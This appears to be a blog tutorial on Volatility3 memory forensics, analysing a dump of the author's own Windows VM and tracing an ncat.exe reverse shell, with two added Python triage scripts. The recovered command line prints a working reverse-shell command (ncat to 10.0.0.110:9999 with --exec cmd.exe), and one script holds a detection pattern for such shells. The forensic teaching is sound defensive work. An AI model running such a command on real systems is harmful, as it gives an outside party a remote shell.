Friday, March 18, 2022

Beginning Volatility3 Memory Forensics

In this post, I'm taking a quick look at Volatility3, to understand its capabilities.

First up, obtaining Volatility3 via GitHub.

┌──(securitynik㉿securitynik)-[~]
└─$ git clone https://github.com/volatilityfoundation/volatility3.git

Next up, get an image. For this, I will take a memory dump of my own virtual machine, using DumpIt.exe from Comae's Toolkit. DumpIt prints the SHA-256 of the dump it writes; keep that value, since it is what lets you show later that the image you analysed is the one that was acquired.

C:\TMP
λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\DumpIt.exe

  DumpIt 3.0.20180307.1
  Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net>
  Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com>
  Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io>

    Destination path:           \??\C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp

    Computer name:              SECURITYNIK-WIN


    --> Proceed with the acquisition ? [y/n] y

    [+] Information:
    Dump Type:                   Microsoft Crash Dump


    [+] Machine Information:
    Windows version:             10.0.19044
    MachineId:                   88688394-D237-438C-92E3-06D84FF93CE9
    TimeStamp:                   132902869567075443
    Cr3:                         0x1aa000
    KdCopyDataBlock:             0xfffff8054df0e2e8
    KdDebuggerData:              0xfffff8054e603b20
    KdpDataBlockEncoded:         0xfffff8054e653b28

    Current date/time:          [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)]
    + Processing... Done.

    Acquisition finished at:    [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)]
    Time elapsed:               0:14 minutes:seconds (14 secs)

    Created file size:           2147020800 bytes (2047 Mb)
    Total physical memory size:  2047 Mb

    NtStatus (troubleshooting):   0x00000000
    Total of written pages:        524173
    Total of inacessible pages:         0
    Total of accessible pages:     524173

    SHA-256: A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3

    JSON path:                  C:\TMP\SECURITYNIK-WIN-20220225-182235.json

Now that I have the memory image, the first step is to get some help on how to use the tool.

Set up a symbolic link for volatility3 so it can be called as vol3 from anywhere.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3

Getting some help!

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --help | more                                                                                                                       
Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]]
                  [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG]
                  [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE]
                  [--write-config] [--clear-cache] [--cache-path CACHE_PATH]
                  [--offline] [--single-location SINGLE_LOCATION]
                  [--stackers [STACKERS ...]]
                  [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
                  plugin ...

An open-source memory forensics framework
....
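
Before pointing any plugin at the image, it is worth confirming the file still matches the SHA-256 DumpIt printed at acquisition, and capturing plugin output in a form that can be parsed later rather than eyeballed. The script below is an added example, not part of the original post or of Volatility3: it streams the image through SHA-256, compares the digest with the acquisition record, then runs a fixed battery of the plugins used in this post with the -q and -r json options shown in the help output, keeping each plugin's stdout and stderr in its own file. It assumes the vol3 symlink created above is on PATH; the plugin list and the output layout are this script's own choices.

```python
"""Verify a memory image against its acquisition hash, then run a plugin
battery with Volatility3's JSON renderer. Added example; assumes the vol3
symlink from the post is on PATH."""
import hashlib
import json
import os
import subprocess
import sys

# Plugins walked through in the post, in triage order (this script's own choice).
PLUGINS = [
    "windows.info.Info", "windows.pslist.PsList", "windows.psscan.PsScan",
    "windows.netstat.NetStat", "windows.netscan.NetScan", "windows.cmdline.CmdLine",
]


def sha256_file(path, chunk=1 << 20):
    """Stream the file through SHA-256; a 2 GB dump should not be read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_image(path, expected):
    """True if the image still matches the digest DumpIt printed (case and whitespace ignored)."""
    return sha256_file(path) == expected.strip().lower()


def build_commands(image, plugins=PLUGINS, extra=()):
    """One argv per plugin: -q drops the progress line, -r json gives parseable rows.
    Plugin options such as --pid go after the plugin name, so `extra` is appended last."""
    return [["vol3", "-q", "-r", "json", "-f", image, plugin, *extra] for plugin in plugins]


def run_battery(image, outdir, plugins=PLUGINS):
    """Run every plugin, keep raw stdout/stderr per plugin, return row counts (None = failed)."""
    os.makedirs(outdir, exist_ok=True)
    counts = {}
    for argv in build_commands(image, plugins):
        plugin = argv[6]
        proc = subprocess.run(argv, capture_output=True, text=True)
        with open(os.path.join(outdir, plugin + ".json"), "w") as fh:
            fh.write(proc.stdout)
        with open(os.path.join(outdir, plugin + ".stderr"), "w") as fh:
            fh.write(proc.stderr)
        try:
            counts[plugin] = len(json.loads(proc.stdout))  # JSON renderer emits a list of rows
        except json.JSONDecodeError:
            counts[plugin] = None  # plugin failed or printed something else; see the .stderr file
    return counts


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} IMAGE EXPECTED_SHA256 OUTDIR")
    image, expected, outdir = sys.argv[1:]
    if not verify_image(image, expected):
        sys.exit("image hash does not match the acquisition record; re-copy or re-acquire")
    for plugin, n in run_battery(image, outdir).items():
        print(f"{plugin:28} {'FAILED' if n is None else f'{n} rows'}")
```

Run it as `python3 triage.py SECURITYNIK-WIN-20220225-182235.dmp A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3 ./out`. A plugin that fails (as pstree does later in this post) shows up as FAILED instead of stopping the run, and its stderr sits next to the empty JSON file for inspection.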

With an understanding of the basic usage of the tool in place, time to use it. First up, getting information on the image.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Variable        Value

Kernel Base     0xf8054da03000
DTB     0x1aa000
Symbols file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 WindowsCrashDump64Layer
base_layer      2 FileLayer
KdVersionBlock  0xf8054e612378
Major/Minor     15.19041
MachineType     34404
KeNumberProcessors      1
SystemTime      2022-02-25 18:22:36
NtSystemRoot    C:\Windows
NtProductType   NtProductWinNt
NtMajorVersion  10
NtMinorVersion  0
PE MajorOperatingSystemVersion  10
PE MinorOperatingSystemVersion  0
PE Machine      34404
PE TimeDateStamp        Mon Jan 22 06:20:17 2103

Above, we can grab information such as the kernel build (Major/Minor 15.19041; DumpIt reported 10.0.19044, which is the same code base, the kernel keeping the 19041 build number while the enablement package raises the version Windows reports), whether the kernel is 64-bit, the processor count, and the system time at which the image was taken (2022-02-25 18:22:36, matching DumpIt's timestamp). The DTB of 0x1aa000 matches the Cr3 value DumpIt printed, a quick sanity check that Volatility found the right page tables. The PE TimeDateStamp of 2103 is not a real date: since Windows 10, Microsoft fills that PE header field with a reproducible-build hash rather than a link time, so it should not be read as evidence of anything.

Next up, looking at the processes which were running at the time this snapshot was taken. pslist walks the kernel's ActiveProcessLinks list, so it only reports processes the kernel still has linked in. Below I've chosen to focus on ncat.exe.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xd187b9684040  111     -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
72      4       Registry        0xd187b9754040  4       -       N/A     False   2022-02-25 18:20:35.000000      N/A     Disabled
352     4       smss.exe        0xd187bcf02080  3       -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
444     432     csrss.exe       0xd187c01ea140  11      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
512     432     wininit.exe     0xd187be054080  5       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
520     504     csrss.exe       0xd187be053140  11      -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
580     504     winlogon.exe    0xd187be090080  6       -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
604     512     services.exe    0xd187be097080  10      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
612     512     lsass.exe       0xd187be09d080  8       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
...
4492    4756    ncat.exe        0xd187c11a5080  5       -       1       False   2022-02-25 18:22:18.000000      N/A     Disabled
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4500    4260    cmd.exe 0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4584    3960    DumpIt.exe      0xd187c1f81080  6       -       1       False   2022-02-25 18:22:35.000000      N/A     Disabled
4636    748     WmiPrvSE.exe    0xd187c1e430c0  11      -       0       False   2022-02-25 18:22:36.000000      N/A     Disabled

Looking at the processes via the psscan plugin. Unlike pslist, psscan carves _EPROCESS structures out of memory by pool tag, so it can also surface terminated or unlinked (hidden) processes; an entry that psscan reports but pslist does not is worth a closer look. Here the two agree on the ncat.exe and cmd.exe rows, and the psscan excerpt also shows the full chain of parents: cmd.exe (4756) spawned ncat.exe (4492), which spawned the 32-bit ncat.exe (4260).

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.psscan.PsScan
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xd187b9684040  111     -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
72      4       Registry        0xd187b9754040  4       -       N/A     False   2022-02-25 18:20:35.000000      N/A     Disabled
352     4       smss.exe        0xd187bcf02080  3       -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
520     504     csrss.exe       0xd187be053140  11      -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
512     432     wininit.exe     0xd187be054080  5       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
580     504     winlogon.exe    0xd187be090080  6       -       1       False   2022-02-25 18:20:39.000000      N/A     Disabled
604     512     services.exe    0xd187be097080  10      -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
612     512     lsass.exe       0xd187be09d080  8       -       0       False   2022-02-25 18:20:39.000000      N/A     Disabled
...
4492    4756    ncat.exe        0xd187c11a5080  5       -       1       False   2022-02-25 18:22:18.000000      N/A     Disabled
...
3960    3304    cmd.exe 0xd187c1aed080  3       -       1       False   2022-02-25 18:21:10.000000      N/A     Disabled
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
...
4500    4260    cmd.exe 0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4756    4696    cmd.exe 0xd187c1cef080  4       -       1       False   2022-02-25 18:21:55.000000      N/A     Disabled
...
4584    3960    DumpIt.exe      0xd187c1f81080  6       -       1       False   2022-02-25 18:22:35.000000      N/A     Disabled

Looking at the network connections at the time of acquisition, with a focus on the process associated with ncat.exe. netstat walks the TCP/IP driver's partition and port tables, so it reports the connections the driver was tracking when the dump was taken.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netstat.NetStat 
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xd187bff9e730  TCPv4   10.0.0.102      49671   10.0.0.110      9999    ESTABLISHED     4260    ncat.exe        2022-02-25 18:22:18.000000 
....

Above, there is one established connection, from 10.0.0.102:49671 out to 10.0.0.110:9999, owned by PID 4260. I will come back to this shortly. Taking another look with netscan, which pool-scans for connection and endpoint objects instead of walking the driver's tables, so it can also recover closed or unlinked connections and listening endpoints.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netscan.NetScan                                                   
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xd187b9697b50  TCPv4   0.0.0.0 5357    0.0.0.0 0       LISTENING       4       System  2022-02-25 18:20:41.000000 
0xd187b9697b50  TCPv6   ::      5357    ::      0       LISTENING       4       System  2022-02-25 18:20:41.000000 
0xd187b9697cb0  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
0xd187bc7a0050  TCPv4   10.0.0.102      139     0.0.0.0 0       LISTENING       4       System  2022-02-25 18:20:40.000000 
0xd187bc7a01b0  TCPv4   0.0.0.0 49668   0.0.0.0 0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
0xd187bc7a01b0  TCPv6   ::      49668   ::      0       LISTENING       1832    spoolsv.exe     2022-02-25 18:20:43.000000 
...
0xd187c1e3c4b0  UDPv4   127.0.0.1       1900    *       0               1560    svchost.exe     2022-02-25 18:22:35.000000 
0xd187c1e3d2c0  UDPv6   ::1     1900    *       0               1560    svchost.exe     2022-02-25 18:22:35.000000 

Focusing on the previously identified PID 4260.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled

Did the process with PID 4260 spawn any other processes? Let's grep all the processes to see if anything matches; grep matches 4260 in either the PID or the PPID column (or anywhere else on the row), so each hit still has to be read. Obviously, a better view would have been to use the process tree via windows.pstree.PsTree. However, this returned an error, so I had to find an alternate path.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | grep 4260
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4500    4260    cmd.exe         0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled

Looks like ncat.exe spawned a cmd.exe: PID 4500 has PPID 4260 and the same creation time, and both are WoW64 (32-bit) processes. Time to dig even deeper into ncat.exe to see what the command line looks like.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4260                                                       
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Args

4260    ncat.exe        "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe

Above, the ncat.exe command line tells the whole story: it connects out to 10.0.0.110 on port 9999 and, with --exec cmd.exe, wires the shell's standard input and output to that socket. This is a reverse shell, and it matches the ESTABLISHED connection netstat reported for PID 4260 and the cmd.exe child seen in pslist. This is good information so far.

Looking at the command line for cmd.exe with PID 4500

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Args

4500    cmd.exe cmd.exe

The child was started with a bare cmd.exe, so nothing here is as interesting as the command line for ncat.exe; the parent's arguments are where the intent is recorded.
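
Since pstree errored out, the parent/child relationships above had to be recovered by hand. The script below, an added example that is not part of the original post or of Volatility3, rebuilds the tree from saved pslist output and joins it with netstat and cmdline output to flag the reverse-shell shape seen here: a process with an established outbound TCP session that either spawned a shell or was told to exec one. The sample rows are copied from the plugin output above; the set of shell names and the exec-flag pattern are this script's own assumptions. It also handles the UDP rows, whose empty State column shifts the fields when a row is split on whitespace.

```python
"""Rebuild the process tree from windows.pslist output and flag a process
that talks to a remote host while running a shell. Added example; the
sample rows are copied from the plugin output in the post, everything
else (shell names, exec flags) is this script's own assumption."""
import re
from collections import defaultdict

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash.exe", "sh.exe"}   # assumption
EXEC_FLAGS = re.compile(r"(?:^|\s)(?:--exec|--sh-exec|-e)(?:\s|=|$)")      # ncat/nc style, assumption

# Constructed sample: rows copied from the pslist, netstat and cmdline output above.
PSLIST_OUT = r"""
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xd187b9684040  111     -       N/A     False   2022-02-25 18:20:37.000000      N/A     Disabled
...
4756    4696    cmd.exe 0xd187c1cef080  4       -       1       False   2022-02-25 18:21:55.000000      N/A     Disabled
4492    4756    ncat.exe        0xd187c11a5080  5       -       1       False   2022-02-25 18:22:18.000000      N/A     Disabled
4260    4492    ncat.exe        0xd187c1af3080  3       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
4500    4260    cmd.exe 0xd187c1bc6080  2       -       1       True    2022-02-25 18:22:18.000000      N/A     Disabled
"""
NETSTAT_OUT = r"""
Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xd187b9697b50  TCPv4   0.0.0.0 5357    0.0.0.0 0       LISTENING       4       System  2022-02-25 18:20:41.000000
0xd187bff9e730  TCPv4   10.0.0.102      49671   10.0.0.110      9999    ESTABLISHED     4260    ncat.exe        2022-02-25 18:22:18.000000
0xd187c1e3c4b0  UDPv4   127.0.0.1       1900    *       0               1560    svchost.exe     2022-02-25 18:22:35.000000
"""
CMDLINE_OUT = r"""
PID     Process Args

4260    ncat.exe        "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe
4500    cmd.exe cmd.exe
"""


def _rows(text):
    """Data rows of a vol3 table: first field is a PID or an offset; banner, header, '...' are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if parts and re.fullmatch(r"0x[0-9a-fA-F]+|\d+", parts[0]):
            yield parts


def parse_pslist(text):
    """pid -> {ppid, name, offset}"""
    return {int(p[0]): {"ppid": int(p[1]), "name": p[2], "offset": p[3]} for p in _rows(text)}


def parse_netstat(text):
    conns = []
    for p in _rows(text):
        if p[1].startswith("UDP"):      # UDP rows have an empty State column, so PID/Owner shift left
            state, pid, owner = "", int(p[6]), p[7]
        else:
            state, pid, owner = p[6], int(p[7]), p[8]
        conns.append({"proto": p[1], "laddr": p[2], "lport": int(p[3]), "faddr": p[4],
                      "fport": int(p[5]), "state": state, "pid": pid, "owner": owner})
    return conns


def parse_cmdline(text):
    """pid -> full command line (split at most twice so the arguments keep their spaces)."""
    cmds = {}
    for line in text.splitlines():
        p = line.split(None, 2)
        if len(p) == 3 and p[0].isdigit():
            cmds[int(p[0])] = p[2]
    return cmds


def children_map(procs):
    kids = defaultdict(list)
    for pid, info in procs.items():
        kids[info["ppid"]].append(pid)
    return kids


def render_tree(procs, root, depth=0, kids=None):
    """Indented lines for the subtree under `root` (pstree by hand)."""
    kids = kids if kids is not None else children_map(procs)
    name = procs[root]["name"] if root in procs else "<not in pslist>"
    lines = [f"{'  ' * depth}{name} (pid {root})"]
    for child in sorted(kids[root]):
        lines.extend(render_tree(procs, child, depth + 1, kids))
    return lines


def flag_shell_over_socket(procs, conns, cmds):
    """Processes with an ESTABLISHED TCP session that spawned a shell or carry an exec flag."""
    kids = children_map(procs)
    findings = []
    for c in conns:
        if not (c["proto"].startswith("TCP") and c["state"] == "ESTABLISHED" and c["pid"] in procs):
            continue
        pid = c["pid"]
        shell_kids = [k for k in kids[pid] if procs[k]["name"].lower() in SHELLS]
        exec_flag = bool(EXEC_FLAGS.search(cmds.get(pid, "")))
        if shell_kids or exec_flag:
            findings.append({"pid": pid, "name": procs[pid]["name"], "children": shell_kids,
                             "remote": f"{c['faddr']}:{c['fport']}", "exec_flag": exec_flag})
    return findings


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_OUT)
    print("\n".join(render_tree(procs, 4756)))
    for f in flag_shell_over_socket(procs, parse_netstat(NETSTAT_OUT), parse_cmdline(CMDLINE_OUT)):
        print(f"[!] {f['name']} pid {f['pid']} -> {f['remote']}: shell children {f['children']}, "
              f"exec flag {f['exec_flag']}")
```

On a real case, save each plugin's output to a file (`vol3 -f image windows.pslist.PsList > pslist.txt`, and likewise for netstat and cmdline) and pass the file contents to the three parsers; the parsers ignore the banner, the progress line and the header, so the files need no cleanup. The exec-flag check is what catches the case where the child has already exited and only the parent's command line records that a shell was handed to the socket.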

Looking at the DLLs loaded by ncat.exe. Only 64-bit modules appear (ntdll.dll and the wow64*.dll layer): pslist flagged this process as Wow64, meaning a 32-bit binary running on 64-bit Windows, and in this version dlllist walks the 64-bit PEB's loader list, which does not contain the 32-bit DLLs the program actually uses. A short list like this is therefore expected for a WoW64 process, not a sign that the program loaded nothing.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process         Base            Size            Name            Path                                                                                LoadTime                        File output

4260    ncat.exe        0x730000        0x1a1000        ncat.exe        C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe      2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe2ab70000  0x1f5000        ntdll.dll       C:\Windows\SYSTEM32\ntdll.dll   2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe2a810000  0x59000         wow64.dll       C:\Windows\System32\wow64.dll   2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x7ffe29950000  0x83000         wow64win.dll    C:\Windows\System32\wow64win.dll                                                     2022-02-25 18:22:18.000000      Disabled
4260    ncat.exe        0x771d0000      0xa000          wow64cpu.dll    C:\Windows\System32\wow64cpu.dll                                                     2022-02-25 18:22:18.000000      Disabled

Looking at the DLLs for the cmd.exe process with PID 4500. Same WoW64 picture: the image is C:\Windows\SysWOW64\cmd.exe, the 32-bit cmd.exe, since a 32-bit ncat.exe can only spawn the 32-bit shell by default.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Base    Size    Name    Path    LoadTime        File output

4500    cmd.exe 0x1000000       0x5a000 cmd.exe C:\Windows\SysWOW64\cmd.exe     2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe2ab70000  0x1f5000        ntdll.dll       C:\Windows\SYSTEM32\ntdll.dll   2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe2a810000  0x59000 wow64.dll       C:\Windows\System32\wow64.dll   2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x7ffe29950000  0x83000 wow64win.dll    C:\Windows\System32\wow64win.dll        2022-02-25 18:22:18.000000      Disabled
4500    cmd.exe 0x771d0000      0xa000  wow64cpu.dll    C:\Windows\System32\wow64cpu.dll        2022-02-25 18:22:18.000000      Disabled

Looking at the modules with ldrmodules, which cross-references the three PEB loader lists (InLoad, InInit, InMem) against the image files mapped into the process, so that a DLL mapped into memory but missing from the lists stands out.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.ldrmodules.LdrModules --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Pid     Process Base    InLoad  InInit  InMem   MappedPath

4260    ncat.exe        0x75c20000      False   False   False   \Windows\SysWOW64\KernelBase.dll
4260    ncat.exe        0x730000        True    False   True    \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe
4260    ncat.exe        0x1400000       False   False   False   \Windows\SysWOW64\winnlsres.dll
4260    ncat.exe        0x1410000       False   False   False   \Windows\System32\en-US\winnlsres.dll.mui
4260    ncat.exe        0x73a70000      False   False   False   \Windows\SysWOW64\apphelp.dll
4260    ncat.exe        0x10000000      False   False   False   \Windows\SysWOW64\pcapwsp.dll
4260    ncat.exe        0x75180000      False   False   False   \Windows\SysWOW64\kernel32.dll
4260    ncat.exe        0x745e0000      False   False   False   \Windows\SysWOW64\cryptsp.dll
4260    ncat.exe        0x74500000      False   False   False   \Windows\SysWOW64\mswsock.dll
4260    ncat.exe        0x73b20000      False   False   False   \Windows\SysWOW64\cryptbase.dll
4260    ncat.exe        0x74560000      False   False   False   \Windows\SysWOW64\rsaenh.dll
4260    ncat.exe        0x750a0000      False   False   False   \Windows\SysWOW64\gdi32full.dll
4260    ncat.exe        0x747b0000      False   False   False   \Windows\SysWOW64\version.dll
4260    ncat.exe        0x759d0000      False   False   False   \Windows\SysWOW64\gdi32.dll
4260    ncat.exe        0x75830000      False   False   False   \Windows\SysWOW64\user32.dll
4260    ncat.exe        0x75b60000      False   False   False   \Windows\SysWOW64\msvcrt.dll
4260    ncat.exe        0x771e0000      False   False   False   \Windows\SysWOW64\ntdll.dll
4260    ncat.exe        0x763e0000      False   False   False   \Windows\SysWOW64\advapi32.dll
4260    ncat.exe        0x75ee0000      False   False   False   \Windows\SysWOW64\msvcp_win.dll
4260    ncat.exe        0x75e60000      False   False   False   \Windows\SysWOW64\sechost.dll
4260    ncat.exe        0x75e40000      False   False   False   \Windows\SysWOW64\bcrypt.dll
4260    ncat.exe        0x762a0000      False   False   False   \Windows\SysWOW64\imm32.dll
4260    ncat.exe        0x762d0000      False   False   False   \Windows\SysWOW64\bcryptprimitives.dll
4260    ncat.exe        0x766e0000      False   False   False   \Windows\SysWOW64\rpcrt4.dll
4260    ncat.exe        0x766c0000      False   False   False   \Windows\SysWOW64\win32u.dll
4260    ncat.exe        0x76460000      False   False   False   \Windows\SysWOW64\ucrtbase.dll
4260    ncat.exe        0x76cf0000      False   False   False   \Windows\SysWOW64\ws2_32.dll
4260    ncat.exe        0x771d0000      True    True    True    \Windows\System32\wow64cpu.dll
4260    ncat.exe        0x7e110000      False   False   False   \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll
4260    ncat.exe        0x7ffe2a810000  True    True    True    \Windows\System32\wow64.dll
4260    ncat.exe        0x7ffe29950000  True    True    True    \Windows\System32\wow64win.dll
4260    ncat.exe        0x7ffe2ab70000  True    True    True    \Windows\System32\ntdll.dll

Nothing seems out of the way above once the WoW64 context is taken into account. The SysWOW64 DLLs show False in all three columns because they live in the process's 32-bit loader lists, which this plugin does not walk, so they are reported only as mapped images; the ncat.exe main image is, as expected, absent from the InInit list; and the 64-bit ntdll.dll and wow64 modules are in all three. The one non-Microsoft entry, ConEmuHk.dll under \Tools\Cmder, is the console hook ConEmu injects into processes started from that terminal, consistent with the Cmder prompt used to run DumpIt above. The same columns are what would expose a DLL injected by hand or an unlinked module, which is the real reason to run this plugin. Dumping the files associated with ncat.exe.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dumpfiles.DumpFiles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
Cache   FileObject      FileName        Result

ImageSectionObject      0xd187bfc10bb0  KernelBase.dll  file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img
DataSectionObject       0xd187c14add70  ncat.exe        Error dumping file
ImageSectionObject      0xd187c14add70  ncat.exe        file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
...

With the files dumped, taking a closer look at the files.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ ls | grep ncat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
...

Using the file command to identify the two files above.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ file  file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \
> file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat:  PE32 executable (console) Intel 80386, for MS Windows

We can see both are reported as PE32 (not PE32+) executables for Intel 80386, i.e. 32-bit binaries, consistent with the Wow64 flag. The ImageSectionObject dump is the executable as mapped for execution and the DataSectionObject dump is the file as cached for reads; either can be hashed and compared against the on-disk binary or a known-good ncat release. Good start.

A different view of file information, via filescan, which carves _FILE_OBJECT structures out of memory whether or not a process still holds them open.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.filescan.FileScan | grep -i ncat                                                 
0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe   216
0xd187c1e11be0  \ProgramData\chocolatey\bin\ncat.exe    216
